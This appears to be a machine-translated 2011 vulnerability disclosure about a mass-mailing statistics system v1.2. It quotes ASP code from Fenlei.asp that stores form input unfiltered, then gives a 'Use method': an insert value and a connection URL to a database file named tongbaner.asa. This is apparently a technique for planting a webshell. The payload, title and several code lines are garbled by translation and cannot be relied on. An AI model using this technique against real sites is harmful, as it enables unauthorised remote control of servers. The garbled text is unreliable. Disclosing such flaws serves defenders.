The copper plate while the net mass mailing statistics system v1. 2 vulnerability and the Fix-vulnerability warning-the black bar safety net

2011-10-14T00:00:00
ID MYHACK58:62201132053
Type myhack58
Reporter 佚名
Modified 2011-10-14T00:00:00

Description

Team:makebugs # Author: fate

'Fenlei. asp

IF Request. QueryString("Action")="del" Then

ID=Request. QueryString("ID")

IF Countss ("tui","Fenlei",ID )<>0 then

'Slightly

IF Request. QueryString("Action")="Add" Then

Tname=Request. Form("Typename")

Set Rs=Server. CreateObject("adodb. Recordset")

Sql="Select * From Fenlei Order by id Desc "

Rs. Open Sql,Conn,1,3

Rs. Addnew

Rs("Typename")=Tname

'Slightly

Set Rs=Server. CreateObject("adodb. Recordset")

Sql="Select * From Fenlei Order by id Desc "

Rs. Open Sql,Conn,1,1

'Slightly

%>

There is no filter, directly into the database.

Use method:

Insert:┼pay offs number 畣 whole 爠 Hwan enemy 瑳∨≡┩>

Connection: http://127.0.0.1/###tongbaner.asa

'Default installation files:

'install. asp

http://t.qq.com/MakeBug

Fix: filter malicious input